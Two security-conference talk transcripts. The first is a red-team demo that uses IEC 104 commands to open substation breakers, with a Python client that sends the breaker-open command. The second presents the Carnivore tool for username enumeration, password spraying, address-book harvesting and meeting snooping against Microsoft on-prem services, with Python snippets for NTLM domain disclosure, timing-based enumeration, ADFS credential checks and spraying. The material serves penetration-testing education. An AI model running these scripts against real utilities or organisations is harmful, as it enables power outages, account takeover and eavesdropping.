It is a very simple model of a substation, so we can jump into the second video. In this one we connect directly to the RTU's web interface — this is the IP address of the first Ethernet interface — using a username and password. You can easily see the configuration management page: which configuration file is currently active, when the configuration file was last updated, and you can get the configuration file from the device, delete it, and so on. Under the monitoring section you can watch the signals, the system log, the system events, the status and the client/station log. The hardware tree here is live monitoring of the RTU: you can see that the RTU is active and operable, meaning it is connected to the IED device, the circuit-breaker/switch position is on, and the metering information about the system is live, real-time data. Now let me talk a little about the configuration file; our third video is about the configuration file and extracting data from it. Again, this does not indicate any vulnerability in the RTU, but if you somehow reach the backup systems, a file server or an IT system and get hold of the configuration file, you can download it and extract data from it very easily, before any further reverse engineering or implementation of anything. In this case we are not in the remote substation and not in the control room; somehow we got the configuration file — it could be from an engineering workstation, a historian or file server, a backup system, or maybe an engineering partner's workstation. Once I have the configuration file I am directly able to see what kind of RTU is used, which version, for what purpose they are using it, what interfaces and IP addresses it has, and what protocols it speaks, which will affect my further planning in the red teaming activity — plus what devices are connected to that RTU in the substation and which signal parameters they are looking at. So without any probing, any scanning activity or any physical attachment, it really leverages your efforts once you have that kind of specific knowledge. We also have some projects that reverse engineer the parts of the file that are not in a human-readable format, at which point you have much better information and knowledge about the targeted system. What we want to show you is that you don't need to go to the control center or the remote substation: if you are able to get the config files, you may read them directly with Notepad++, read the data, understand the process, understand the protocols and interfaces, and plan a better red teaming activity or targeted attack against the targeted system.
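As a trivial illustration of that triage step, a few lines of scripting are enough to pull the obviously useful strings out of an exported configuration file before any reverse engineering. The file name and keyword list below are placeholders for the sketch, not details taken from the talk.

```python
import re

# Placeholder file name - an RTU configuration export grabbed from a backup share,
# file server or engineering workstation, not from the substation itself.
CONFIG_FILE = "rtu_export.cfg"

with open(CONFIG_FILE, errors="ignore") as f:
    text = f.read()

# Any IPv4 addresses referenced in the export (SCADA masters, IEDs, gateways, ...)
ips = sorted(set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", text)))

# Crude keyword sweep for protocol hints worth following up on
protocol_keywords = [kw for kw in ("60870-5-104", "Modbus", "DNP3", "61850")
                     if kw.lower() in text.lower()]

print("IP addresses referenced:", ips)
print("Protocol keywords seen :", protocol_keywords)
```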
Now I will hand over to Serkan for his part. — Yes; before the attack, this is about the normal, legitimate application-level communication between the SCADA system and the RTU. First of all I will show my IP address, which is in the same subnet as RTU interface 1, and we use Kepware's KEPServer as the SCADA master software. This is the master-side KEPServer configuration: the communication address, the common address, and under the advanced settings the network interface — we are in the same subnet — plus more advanced IEC 104 parameters such as the originator address, and the network interface itself, meaning the real IP of the RTU and the IEC 104 port. On this screen we also configure our signals: this one is an analog short float value, ASDU address 1, information object address 103, and this one is the breaker control command — a single command — which will directly open and close the breakers; later we will apply some scenarios with it, so it is really important to understand what type of parameters and what type of commands they take. Here we are connected to the RTU and you can see the real-time data: active power 2400, breaker control 0, and breaker position 1, meaning closed. Now we send the breaker control command with value 1 — it takes the command in real time, in real-time operation — and with this command we re-energize or shut down the circuit breaker. All right, now I would also like to show some Wireshark traffic between KEPServer and the RTU. These are the frames; we apply a display filter for IEC 104, and you can see the test frames (TESTFR) in the protocol. Now we re-send the command and look at the traffic: this is a single command, ASDU address 1, information object address 107, and the set command value is 0. You can easily read this information from Wireshark because IEC 104 is a plain-text protocol — not encrypted, not hashed — so you can easily get information from the traffic; you can see the single or double command taking place in IEC 104. In that case we sent a specific shutdown/open command for a targeted area, and because the value was 0 it means we shut down the electricity through legitimate traffic — traffic generated by the control center. Now we will try to do the same from the attacker's point of view, someone who is in the remote substation via implanted hardware; this is our fifth video. We have information about the second interface of the RTU, so on the attacker machine I configure my IP address for the second interface's subnet. Then I use Nmap to search for open ports: IEC 104 uses a specific well-known port (2404) if nobody changes it, so we are looking in the same subnet for anything exposing that protocol — please be aware, this is the attacker's point of view, having gotten into the substation and looking for IEC 104 endpoints. We found two devices; this one is the RTU device, as you can see from the IP address, the IEC 104 port is open and the service is up. At this point we only have information about the RTU's protocol and IP address — we have no information about the signals or the signal addresses. So we use KEPServer again on the attacker side, configure it, and connect to the RTU; in the protocol structure there is a general interrogation command, and when we send this command the RTU responds with all the information held inside it. We send the GI command to the RTU without knowing any information object addresses, and from the responses we can now easily observe which addresses exist and what type of information is behind them — for example, information object address 100 with a value of 332, and so on.
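For readers who want to see what that exchange looks like on the wire, here is a bare-bones sketch of an IEC 60870-5-104 client doing the same three steps — STARTDT, a general interrogation, then a single command. The IP address is a placeholder; common address 1 and information object address 107 are the lab values quoted above, and sequence-number handling is deliberately simplified, so treat it as an illustration of the framing, not a usable tool.

```python
import socket
import struct

RTU_IP  = "192.168.2.20"   # placeholder - the RTU's second Ethernet interface in the lab
PORT    = 2404             # default IEC 60870-5-104 TCP port
CA      = 1                # common address of ASDU used in this lab
IOA_CB  = 107              # information object address of the breaker single command (lab value)

tx_seq = 0

def i_frame(asdu):
    """Wrap an ASDU in an APCI I-format header. The receive sequence is left at 0 for brevity;
    a real client must track and acknowledge the peer's send sequence numbers."""
    global tx_seq
    apci = struct.pack("<BBHH", 0x68, 4 + len(asdu), (tx_seq << 1) & 0xFFFF, 0)
    tx_seq += 1
    return apci + asdu

def build_asdu(type_id, ioa, element):
    # type id, VSQ = 1 object, cause of transmission 6 (activation), originator 0,
    # common address, then the 3-byte information object address and the element payload
    return (struct.pack("<BBBBH", type_id, 0x01, 0x06, 0x00, CA)
            + ioa.to_bytes(3, "little") + element)

s = socket.create_connection((RTU_IP, PORT), timeout=5)

# U-frame STARTDT ACT; the RTU should answer with STARTDT CON (control byte 0x0B)
s.sendall(bytes([0x68, 0x04, 0x07, 0x00, 0x00, 0x00]))
print("STARTDT reply :", s.recv(1024).hex())

# C_IC_NA_1 (type 100), QOI = 20: station/general interrogation - the RTU returns every configured point
s.sendall(i_frame(build_asdu(100, 0, bytes([0x14]))))
print("GI responses  :", s.recv(4096).hex())   # in practice this spans several APDUs

# C_SC_NA_1 (type 45), SCS = 0, execute: the "open the breaker" value used in this lab
s.sendall(i_frame(build_asdu(45, IOA_CB, bytes([0x00]))))
print("Command ActCon:", s.recv(1024).hex())
s.close()
```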
So basically the protocol gives us the opportunity to pull all kinds of signals and data from the RTU for a specific protocol line. As an attacker we used the exact same tool, but in a simulation environment — you can use that tool in your own lab. There is also another tool, developed as far as I know by a master's-degree student in Germany, called ISEtest, and to be thorough we sent the same commands through that tool against the RTU as well: we send the command again, read the information from the traffic, and send commands to information object address 107. You can see the ON and OFF commands in the Wireshark capture, and in lines 18 and 37 the activation confirmation (C_SC ActCon) coming back from the RTU, which means the RTU accepted and executed the command. So basically: once you get into the substation, you pull the data through the protocol and you send your commands through the protocol. Single and double commands are supported by IEC 104, and with them you are able to shut down the electricity, if that is your end goal; you can apply very different types of scenarios and red teaming activities, but we wanted to show that it can be done. There are some safety and configuration mechanisms to prevent it — sometimes you implement IP-based restrictions or anomaly detection solutions to catch that kind of activity. That brings us to the end of our presentation, with the takeaways we would like to stress: during red teaming activities we need to think outside the box, but we still need to take care of public and process safety — it is really a rule of thumb for us. The power distribution environment is not as complicated, process-wise, as power plants or petrochemical, but it directly affects the other critical infrastructures and the customers. Power distribution companies have lots of different interdependencies, so information gathering plays a key role in red teaming activities, and compared to other ICS infrastructure a power distribution company is both a big target and a broad thing to defend. We have two minutes left — if you have any questions please feel free to ask, and we will be on Discord as well. Serkan, if you have any comment please add it; otherwise you can reach us on Discord and we will be happy to answer your questions. — John and Serkan, thank you for your talk; I noted in the Discord speaker Q&A that I consider this a mandatory talk to watch, both for learning the 101 and for assessments, so I really appreciate you dialling in and supporting us. — Thank you very much for having us; I hope you enjoy.
|
Hacking into distribution companies.
|
10.5446/50828 (DOI)
|
Hello, my name is Chris Nevin and I work for NCC Group. This tool is called Carnivore — a Microsoft External Attack Tool, or assessment tool, and as the acronym-spotters among you will notice, that spells MEAT, which is very amusing for a tool called Carnivore. It is basically a tool to help pentesters find misconfigurations and vulnerabilities in Microsoft on-premises servers. Apologies if I talk quickly, but there is quite a lot to get through. The basic outline of the presentation: I'm going to start with a demonstration to show what the tool can do, and then dive a bit deeper into some of the techniques and the research behind them. So, the intro demonstration — first a quick overview just to give you a taste of what the tool can do. Just before I kick it off: we've selected all services, and we're also going to attempt to discover the internal domain information. You might notice it's a .nev domain — obviously that wouldn't normally be a top-level domain, but this is my training lab. First of all it does DNS lookups for subdomains normally associated with a particular service — for example, lyncdiscover for Skype — then it verifies there's actually something there, so it's not just a wildcard resolution, and it also does some checks on whether it actually seems to be an Exchange or Skype server. I've built in some bail-out options: for example, if we get back a server header saying it's nginx, it's not even Windows, so we don't need to test every possible endpoint just in case one of them is a Skype server. It also validates the username enumeration URL and the password spray URL separately — I'll come on to that in a bit — because there are occasions where an organisation has hidden most things, but there is one password spray URL tucked away somewhere; we try the most obvious endpoints, and if those don't hit there are other possible password spray endpoints, so hopefully if an organisation has something exposed we'll be able to find it and report it to them. We also log everything here, and you've got export options if you want to export things manually for some reason. I'll cover Office 365 more at the end, but for this section, if Office 365 is ticked it will explicitly check whether there is any cloud presence. Even if it's not ticked, the response from Skype for Business, for example, might come back and say it's hosted in the cloud, and then we'll still do the standard checks for whether it's federated and that kind of thing — so if we just did Skype for Business, it says it's in the cloud, and it turns out to be federated, we'll get an Office 365 and an ADFS option added here. We've also got a global verbosity setting you can tweak up and down depending on what you want to see. Okay, let me kick this off. The other thing is the discover-internal-domain option: it does the fairly standard blank NTLM type 1 message trick, and you can see it has pulled back the internal domain name. At the moment it does that individually for each of these services, because Skype might be hosted in Germany while the ADFS server is in Canada for some reason.
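For reference, the blank NTLM type 1 trick itself only takes a few lines: you send a bare NEGOTIATE message and parse the internal domain out of the CHALLENGE that comes back. This is a generic sketch of the idea, not Carnivore's own code, and the URL is a placeholder.

```python
import base64
import struct
import urllib.request
import urllib.error

# Placeholder URL - any endpoint that answers with "WWW-Authenticate: NTLM" will do
URL = "https://mail.example.com/autodiscover/autodiscover.xml"

# Minimal NTLM NEGOTIATE (type 1): signature, message type, a few flags, empty domain/workstation fields
FLAGS = 0x00000207            # UNICODE | OEM | REQUEST_TARGET | NTLM
type1 = b"NTLMSSP\x00" + struct.pack("<II", 1, FLAGS) + b"\x00" * 16

req = urllib.request.Request(URL, headers={"Authorization": "NTLM " + base64.b64encode(type1).decode()})
challenge = ""
try:
    urllib.request.urlopen(req, timeout=10)
except urllib.error.HTTPError as e:            # the 401 response carries the CHALLENGE (type 2) message
    challenge = e.headers.get("WWW-Authenticate", "")

if "NTLM " in challenge:
    blob = base64.b64decode(challenge.split("NTLM ")[1].split(",")[0])
    # The TargetName field descriptor sits at offset 12: length, max length, buffer offset
    name_len, _, name_off = struct.unpack("<HHI", blob[12:20])
    print("Internal domain:", blob[name_off:name_off + name_len].decode("utf-16-le"))
else:
    print("No NTLM challenge returned")
```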
So when you're spraying a particular server, you've got the internal domain information for that particular server — and in fact on a job just last week these were all different, so it does happen quite frequently. I might add an advanced option to just assume they're all the same, but, like I say, that's maybe a recipe for potential disaster. We've also got the IP addresses here, so you can check those against your scope; if you want, you can run this once, check the IP addresses against scope, and only then do the more active blank NTLM type 1 message. The other thing to mention for Skype is that lyncdiscover is the autodiscover service, and it points to the real server, which is what we actually want to hit — that's why there are two entries for Skype there. So we've now got Skype, Exchange, ADFS and RDWeb. I'm going to show a quick run-through of username enumeration and password spraying just to give you an idea. Smart enumeration we'll leave on the defaults, and we're also going for Password1, a standard guess. You can see there are quite a lot of usernames to try as it goes through. It has found one of a particular format, so it continues to loop through nine different formats; you'll see that when we discover the correct format the list drops drastically, because we switch to only using usernames of that format. We've now got two of the same format — first initial plus surname — and now three, so it has selected that jsmith format, and if we left it running it would just work through the smaller list of usernames in that format. Now I'll quickly show password spraying as well, using that same jsmith format. The spray uses the modern-style username format — user@navtech.nev — and we'll just try Summer2020, to see if there happens to be a user who was daft enough to use that as a password. That will take a second; I'm sure we won't find anyone, because of course no one ever uses passwords like this — who could possibly be that foolish... and there we go, we've uncovered one user with that password. We used the RDWeb service here, but obviously we could have sprayed any of the other services, and looking at the internal domain information we can probably assume they're going to be the same across all of them. Okay, let's do one with Skype — and, just to show you can also password spray the enumerated users, let's use that same password, just with 2019. For that option we spray the users in the legacy format, because those are the ones we've already enumerated. Username enumeration itself is incredibly slow, because for every invalid user you might have to wait something like 20 or 30 seconds.
When we're spraying this list of already-enumerated users, we already know they exist, so it's actually still quite fast even when spraying in legacy format, because we're not having to wait for every invalid user. We've now got that user as well — you can see we've got his access token here — so I'll quickly show the address book. We'll choose the user we already have an access token for; I'll explain some of these other settings in more detail later, and I'm also going to come back to the meeting snooper — this is just to show the address book functionality. Here we go — you can see all these other users popping up: we get the SIP username, the email address, the title and the department. You can tick these fields on and off; the default settings I've got here are basically the ones we can get relatively quickly. If I expanded that and chose to pull some of the other information, it can take quite a long time, especially with a large domain, so in this instance we just go with the defaults, which is fairly quick. Obviously my test lab has quite a small number of users, but you can see the general gist of what's possible with the tool. Okay, now for some general statistics. I ran a version of this against the top 100,000 of the Alexa top million: 11.79% were attackable at all. This chart shows, of that roughly 11%, how many had each service — obviously some could have more than one. Carnivore started out as a Skype attacking, or assessment, tool, so Skype is secretly my favourite, but you can see it's still getting beaten by Exchange and ADFS, though maybe not by much. One caveat with the cloud element is that there are some false positives, because for this assessment I didn't explicitly check whether they were hosted in Office 365 — this just lists whether, when I made a lyncdiscover request, it came back saying it was hosted in the cloud. So that number might actually be even higher if we had asked explicitly, and for some of them it seems to suggest they're in the cloud but perhaps not everything is properly configured. Like I say, take the cloud figure with a pinch of salt; the others are what was found and verified as existing. So, the first part, subdomain enumeration — let's go into that in a bit more detail. As I said before, I split the username enumeration URL and the password spray endpoint validation. Previously the tool bailed if the username enumeration endpoint wasn't there, but I found multiple times — including on that wider mass assessment — that organisations quite often have just one or the other. For example, here you can see that 53% had a password spray endpoint versus 47% with username enumeration, so about 6% more had a password spray endpoint than had both, and there were some that just had username enumeration.
What's interesting about that is it means that for those organisations with just one odd NTLM-authentication password spray endpoint somewhere, it seems likely they might not even be aware of it: they've filed off or hidden away all of the well-known login points and the username enumeration, but this one password spray endpoint has eluded them. So yes, that's quite interesting. Carnivore looks for the subdomains in the order shown here — the statistics are taken from that 11% of the 100,000 — so hopefully we make as few requests as possible, looking at the one that is most likely to exist first and only trying the others if it doesn't. In future I might add an option to choose between light and full enumeration, so you could look at just the top two and then give up, cutting the number of requests down even further. Now, username enumeration in a little more detail, starting with the demonstration. We've got various options here that I'm going to go through. Smart enumeration, which you saw before, takes these nine different username formats, built from the top statistically-likely-usernames lists, and basically tries the top username in each list, then the top of the next list, and so on — essentially, as you saw, it's looking for three valid usernames of the same format. That uses the timing-based difference, which is fairly well known for Skype and Exchange; I've added it here for ADFS and RDWeb as well. There's an advanced option where, if you want, you can pick a format and where you want to start in that list, or you can leave it as it is; you can also do an individual username or provide your own list, and there are the pre-built ones — standard and service accounts, and Council Killer, which was created by my colleague Owen Bellis and is a list of fairly standard user accounts that might be in there. You can set the password, so it works on the timing-based difference and, if you happen to get the password right as well, then great. Again, this is fairly similar to what we saw before, but one interesting additional point is the extra information you can get depending on the service. For Skype we can determine quite a bit — actually, some of these only come up if you get the password right as well. "SIP enabled" means you've got the username and the password right and that user is set up on Skype. "Account disabled" comes back whatever password you give if the account is disabled — you should see that in a second... in fact, I might have re-enabled that user. If we get a disabled account we essentially won't do anything else with it, because whatever you put in, you're not going to be able to do anything. For Skype you can also tell if the password has expired, and it's possible you might actually then be able to take that password somewhere useful.
If you found an endpoint — maybe for the VPN — you might even be able to put that expired password in and it will ask you to reset it. On a test that's probably a little too crazy a thing to do, but maybe on a red team, or with a green light from the technical point of contact. For Skype we can also get a server error, but again that means you've got the password right, and as I said before you'll get the access token there if you do. So, username enumeration. As you've just seen, smart enumeration takes nine lists of statistically likely usernames and goes through them until it finds three of the same format, then automatically selects that format and carries on. Now, one interesting thing is the difference between the legacy and modern formats: legacy is domain\username, while modern, email-style, is username@domain. They can match, but they don't necessarily have to, and the modern format could match the email address but doesn't have to either. For username enumeration we can only use the legacy format, because that's what gives the timing-based difference, and that causes a little hiccup when rolling over to password spraying. Previously I used username enumeration to discover the format and then just assumed it would be the same for the modern format when spraying; because that technically might not be the case, I don't do that any more. The problem is that on password spraying, if you choose to use the discovered username format, invalid usernames will still take ages. So what I'd suggest is this: with username enumeration every invalid user takes 30 to 40 seconds, so waiting for it to finish would take the rest of the day, or a couple of days. Ideally, use username enumeration to get the likely format — that might take five minutes — then pause it and switch over to password spraying, and instead of using the discovered format (which, being in the legacy style, would take a long time) pick the same format from the list and spray that. Hopefully you'll get some credentials, or some disabled accounts, which tell you it's the correct format; if you don't, it's possible the formats don't match and you'll need to do a bit more manual work going through different potential formats. The other thing to say is that with username enumeration we discover a valid username even if the password is wrong, whereas with password spraying we only find out anything if we get both right. You can stay with username enumeration and get a nice list, and it takes 48 hours; but because you would essentially be hitting the same users with the password you're trying anyway, you don't really lose anything in terms of progressing the test by switching over to spraying — you'll find the same users who might have Password1 as their password, it will just take ten minutes instead of two days. So that would be my suggested method.
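The timing check itself is simple to reproduce. Here is a rough, endpoint-agnostic sketch: the URL, domain and the five-second threshold are illustrative assumptions rather than values from the talk, and the third-party requests-ntlm package is assumed to be available.

```python
import time
import requests
from requests_ntlm import HttpNtlmAuth   # assumed third-party package: pip install requests-ntlm

# Placeholders - the endpoint and internal domain come from the earlier discovery steps
URL    = "https://skype.example.com/WebTicket/WebTicketService.svc"
DOMAIN = "NAVTECH"

def looks_valid(user, password="Password1", threshold=5.0):
    """Valid accounts fail authentication quickly; non-existent ones hang for tens of seconds."""
    start = time.monotonic()
    requests.get(URL, auth=HttpNtlmAuth(f"{DOMAIN}\\{user}", password), verify=False, timeout=60)
    return (time.monotonic() - start) < threshold

for candidate in ("jsmith", "jdoe", "asmith"):
    print(candidate, "-> probably exists" if looks_valid(candidate) else "-> probably does not exist")
```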
Now I'm going to show where we get the timing-based difference, and some other details, for ADFS and RDWeb, because I don't think there's much publicly written about those, whereas there is for Skype and Exchange — so this is maybe the more interesting part. This is where we get the timing-based difference for ADFS. ADFS has an extra interesting bit, which is that it needs an MSIS SAML cookie to be sent in the request. To get that, I first send a request to the same place but with the single sign-out parameter; the response to that gives us the cookie we need, which we then include when we make a password guess, as you can see. Here you'll see the invalid response — just a 200 OK, which by itself tells us nothing, though with the timing difference it may tell us whether the user is valid — and here is a valid response: we get the 302 redirect and it sets the MSISAuth cookie. For RDWeb we make a POST request like this, with the username and the password, to this URL. If it's invalid we again get a 200 OK, and the TSWAAuthHttpOnlyCookie is either absent or blank, so again we can use the timing-based difference for the username. If it's completely valid — username and password both correct — it's again a 302 redirect, and the TSWAAuthHttpOnlyCookie now has a value, as shown there.
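A rough sketch of that ADFS check might look like the following. The idpinitiatedsignon path, the wa=wsignout1.0 parameter and the UserName/Password/AuthMethod form fields are standard ADFS forms sign-in details assumed for the sketch — they are not quoted in the talk — so verify them against the target before relying on them.

```python
import requests

# Placeholder host; endpoint and form-field names below are assumptions (standard ADFS values)
ADFS = "https://adfs.example.com/adfs/ls/idpinitiatedsignon.aspx"

session = requests.Session()

# Step 1: the sign-out request hands back the MSIS SAML cookie needed for a guess
session.get(ADFS, params={"wa": "wsignout1.0"}, verify=False)

# Step 2: post a credential guess with that cookie jar attached
resp = session.post(ADFS,
                    data={"UserName": "NAVTECH\\jsmith",
                          "Password": "Summer2020",
                          "AuthMethod": "FormsAuthentication"},
                    verify=False, allow_redirects=False)

# Invalid guesses come back 200 OK; a valid pair gives a 302 and sets the MSISAuth cookie
if resp.status_code == 302 and "MSISAuth" in resp.cookies:
    print("valid credentials")
else:
    print("invalid credentials (response timing may still hint whether the username exists)")
```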
So now, password spraying. As I said before, there's a little hiccup with the discovered format: it's up to you whether to stick with that discovered (legacy) format or simply choose a format from the list, in which case we'll spray in the user@domain style instead. Password spraying defaults to that style where possible because it's quicker, and if you provide your own list of usernames you can give them as domain\user or user@domain and it will use what you've given. As I said, you can use the pre-built lists or give it a file of your own, pre-loaded with whatever you want. Another thing to say is that you can go straight to password spraying — you don't have to do the username enumeration first. If you've done the subdomain enumeration and you've got the internal domain information, or you've done some OSINT and have an idea what the format might be, you can just come straight here and spray. Okay, a little demonstration of password spraying so I can show it in a bit more detail. The top option is "use discovered username format": if we'd already done the username enumeration we could just tick that, but as I've said it will spray in the legacy format, so you need to be careful. The other choice is to pick which list you want to spray — the in-built lists, a file of your own, or just the enumerated users, which uses the usernames in the format we've already discovered them in, because we know those exist. You can put the password in here, which is obviously distinct from the username enumeration password. If I click spray, you'll see this is much quicker, because it can be multi-threaded — multi-threading the username enumeration would throw off the timing information, because you'd be making it do multiple requests at once. It's gone through the list, and as we saw before it has found this user and access token, and we've also got one with a disabled account. So, as you saw, we've got these different columns. Office 365 spraying I'll come to at the end, but basically if we can spray the Microsoft login portal we can distinguish a valid user from an invalid one, and valid credentials from invalid, and we can actually tell if you've got the right username and password but the organisation has MFA enabled. "SIP enabled" just means they have Skype access, and depending on the service we can tell some additional things — Skype is actually my favourite service to look at because it tells you the most: whether the account is disabled, whether they're SIP enabled, whether the password is expired (so you've got it right but it's expired), and that server error case where we can still tell the username and password are valid. For Exchange and RDWeb we can also still tell if the password is expired or correct, just not the additional detail. Username enumeration is timing-based, so I only have one location per service where that's possible, but for password spraying there are multiple places we can spray. Again, the statistics come from that 100,000 sample, and this is the order Carnivore checks them in when validating whether a password spray endpoint is there — hopefully reducing how many requests we need to make, and in future maybe with an advanced option to only look at the top two, which as you can see would have found it in the vast majority of cases. At the other end, literally one organisation out of that 11% had /WebTicket exposed. This is a mix of publicly documented endpoints and ones taken from IIS on the server itself, all of which allow NTLM authentication. So, NTLM authentication in a bit more detail. Just to mention briefly, when I had a look there didn't seem to be that much out there for web-based NTLM authentication spraying — it's possible Hydra or something similar can do it, but there didn't seem to be many tools for it. Here's a little bit of code, very simple, in C#: we literally just create a new NetworkCredential, give it the username and password, and if the response is 401 Unauthorized it's a bad guess; otherwise you're good to go. Incredibly simple, and Carnivore is able to password spray NTLM auth endpoints. For those you can still do the blank type 1 message trick, and because determining and including the domain name is part of the protocol itself, when we give the username and password we can literally just say cscott, Password1.
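Carnivore's version of that check is C# (HttpWebRequest plus NetworkCredential, as described above) and handles the domain itself; a rough Python equivalent, using the assumed third-party requests-ntlm package and passing the domain explicitly, might look like this — endpoint, domain and usernames are placeholders.

```python
import requests
from requests_ntlm import HttpNtlmAuth   # assumed third-party package: pip install requests-ntlm

# Placeholder endpoint - any of the discovered NTLM-auth URLs (e.g. the /WebTicket one) works here
URL      = "https://skype.example.com/WebTicket/WebTicketService.svc"
DOMAIN   = "NAVTECH"
PASSWORD = "Password1"

for user in ("cscott", "jsmith", "jdoe"):
    r = requests.get(URL, auth=HttpNtlmAuth(f"{DOMAIN}\\{user}", PASSWORD), verify=False, timeout=30)
    # 401 Unauthorized means the guess failed; anything else means the credentials were accepted
    print(f"{user}: {'valid' if r.status_code != 401 else 'invalid'}")
```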
And as part of that request, the protocol adds the navtech domain element itself. An interesting thing to note: as I said before, when I included some NTLM authentication endpoints in the list of subdomains I look at, there were some quite big organisations where everything else seemed to be inaccessible, and then there was one odd NTLM auth endpoint hidden away — meaning they're still susceptible to password spraying against the internal domain. Essentially this could even be used for denial of service: yes, we hit the normal password lockout policies, but if you hit that endpoint on purpose you've locked out everyone in the domain, which is something an organisation would want to be aware of, because that would be a bad day for them as well. A quick sidetrack, with a note on some of these different services in case you haven't seen them before. ADFS is a portal that can be presented to let you sign into different third-party services, which are sometimes assumed to be internal. On past red teams this has given access to full job-posting applications — third-party applications, but linked to the company's Twitter and LinkedIn and all of their job postings — so for phishing, ongoing attacks, or even reputational damage, having access to those through ADFS could be fairly troubling. Basically you go to the URL I gave earlier and it would normally give you a drop-down list of the different applications you can authenticate into. I've also seen internal service desks you can get into that were logging all call-centre queries — incredibly sensitive customer details and information, because the whole call centre was entering "this customer with this bank account number and this credit card number has this question" — basically accessible externally through ADFS, and also things like HR and user-admin portals. One other thing to note: if it's Office 365 and federated, that equals a win. Office 365's password-spraying avoidance and defence mechanisms are fairly brutal, but if the organisation is federated it means not just that you can, but that you have to, hit the ADFS server — and the response to a request I'll show in a bit tells you where that ADFS server is — so we can avoid Office 365's robust defence mechanisms and just hit ADFS the same as we would before. RDWeb is fairly simple: it's literally remote desktop through the web, and depending on how it's configured maybe you'll be able to RDP into a workstation in the domain, that kind of thing. And hopefully you'll have seen Skype and Outlook before. Now, post-compromise: we're going to look at the address-list pulling first, with a quick demonstration. Just as a reminder, this is used to pull the address book through the UCWA API; we have these options, and if you untick both of them you're just looking at the compromised user. The personal contacts are the personal contacts of that compromised user — their favourites.
That's an interesting one for ongoing social engineering, because combined with the other information you've got here, you know your compromised user has this job, their favourites include these people, and those people have these jobs — so in terms of crafting a good phishing payload that's incredibly useful. You can run this on the personal contacts first and then add in the full address list, just to make that distinction, or just pick the full address list. The data fields chosen by default are the ones that are quicker to get. For some reason, the way the UCWA API works, you get different pieces of information depending on where you queried that person from: if they're you, you get one set; if they're in your personal contacts, another; and through the people-search function, another — so the defaults are the stripped-down set you get in every case. If you want to go on and pull everything back, you can, but that can take numerous additional requests per user; for a domain of, say, 6,000 people that could take an incredibly long time. So when we kick this off you'll see it pull back the standard information for the users first, then kick off some additional threads to pull that extra information, which fills in as we go; I'll go over the remaining settings later. As you just saw, the information we can get back through Skype for Business is a bit of a social engineer's dream: the department, the office location they work in, even whether they're online or offline — it can also say online-mobile versus online-desktop, though I've never seen that work in a fully useful way. You can also get the email address and phone number, and the "note" field is any status message they've set; I've quite frequently seen people put annual-leave notices there. So for social engineering you know which office they're in, their name, email address and job title, and that they're going to be out of the office — a lot of information for turning up and saying "I'm supposed to be meeting so-and-so", or even impersonating someone you know definitely won't be in the office. Carnivore pulls the internal address book back using people search on the UCWA API, which means essentially searching letter by letter, A through Z. However, there's an upper limit of 100 on the number of results returned, and there isn't a "next" link to page through the rest, so we basically have to resort to searching by digraphs and trigraphs — ab, ac, ad, and then even abc, abd, abe, and so on.
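Generating those search terms is trivial; a small sketch (the input file name is a placeholder) shows the difference in search volume between the two approaches discussed next.

```python
from itertools import product
from string import ascii_lowercase

# "likely_usernames.txt" is a placeholder for the statistically-likely-usernames lists
with open("likely_usernames.txt") as f:
    names = [n.strip().lower() for n in f if len(n.strip()) >= 3]

common_trigraphs     = sorted({n[:3] for n in names})                              # ~2,249 terms in practice
all_digraphs         = ["".join(p) for p in product(ascii_lowercase, repeat=2)]    # 676 terms
exhaustive_trigraphs = ["".join(p) for p in product(ascii_lowercase, repeat=3)]    # 17,576 terms

print(len(all_digraphs), "digraphs,", len(common_trigraphs), "common trigraphs,",
      len(exhaustive_trigraphs), "exhaustive trigraphs")
# Each term is then sent to the UCWA people-search endpoint, working under its 100-result cap.
```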
So we can then take either the likely, unique three-letter prefixes from the top statistically-likely-usernames lists, or every possible two-character combination. What's interesting and fun about the UCWA API is that there doesn't seem to be much rhyme or reason to what you get back. To take an example, say we're looking for every Paul in the domain and we know there are four. Searching for "P" returns 150 results, so we only get the top 100, and there are two Pauls in there. Then we search for "PA" and get back 20 results, but this time there are three Pauls — one extra — yet even though we haven't hit the upper limit we still haven't got every Paul in the domain. Then we search for "PAU" and now we get this mysterious rogue fourth Paul we've never seen before. So essentially, in the interests of keeping my sanity, I've stuck with digraphs and trigraphs. It's possible you might want to go on to four- and five-character prefixes and whatever those are called, but when I compared the common trigraphs against every possible three-character combination, the exhaustive search only added about one additional user in a domain of 6,000 — and the difference is that "common" does 2,249 requests whereas "every possible" does about 17,500. All of that for one additional user who was hiding away and that we couldn't get otherwise. Hopefully that explains the options on the address list a little more. One additional side note: it's fairly uncommon, but I've seen a misconfigured Microsoft Web Application Proxy where, after you authenticate to the first server and get the token back, trying to use it against the application's endpoint essentially sends it to the wrong place — or you've authenticated to the wrong box — and it's rejected. That actually also stopped the legitimate Skype client from being able to authenticate to Skype, but Carnivore is now able to detect that, re-authenticate to the correct box and carry on — so it can connect and keep using the API even when the legitimate client couldn't. Okay, the final post-compromise function: Meeting Snooper. Unfortunately my lab server stopped working for this, so we'll have to make do with screenshots. This is the Meeting Snooper tab: once you've compromised a user, if Skype is available — this uses the UCWA API as well — you come here and pick the compromised user you want to use, and you can run it for all compromised users or just a selected one. One thing to say is that it only picks up currently scheduled meetings, so you can run it multiple times throughout the day — at the start of the day to see if any new meetings have been added, and then keep running it to pull back new information. First of all it dumps the standard dial-in information to the output log; if you've ever had an email inviting you to a Skype meeting, this will look fairly familiar to you.
You've got the internal number you can dial, and then a number for each country, or city within that country. Apologies for how utterly rubbish this looks — as I said, my training lab unfortunately packed in at the key moment. I should also stress that this isn't an exploit or a zero-day: it's basically highlighting what's already possible by weaponising the UCWA API, and it obviously depends on compromised credentials. But so far this tool has shown how we can go from external, over the internet, to complete compromise, and now to being able to dump out the scheduled meetings of compromised users. One thing to say is that when using this tool on jobs, if you're going to get anyone you'll probably get 50 to 100 users, and in that case this becomes more interesting, because one user might only have one meeting that week, but with 50 users maybe you've got someone a bit more interesting. When you run it, it gives you information for each meeting the compromised user has scheduled. The conference ID there is the PIN: when you dial the phone number it asks for a PIN, and that's the conference ID — and it's unique to that user, so when you dial in you'll be impersonating whoever you've compromised. You dial in, enter the PIN, and show up as, say, "Chris Nevin (Guest)". If the people in the meeting are using the desktop application it might look weird to have multiple Chris Nevin guests, but if everyone is dialling in by phone I'm not sure they'd know at all — and even if they did see two Chris Nevin guests, how likely is it they'd assume someone is impersonating him and joining in to listen, rather than some weird bug? The information we get also includes the subject of the meeting and the attendees. The meetings here were obviously scheduled just to demonstrate, but it could be a lot more juicy: say you've compromised a user who, from the address book, is the head of financial fraud, and the meeting subject shows it's the weekly financial crime 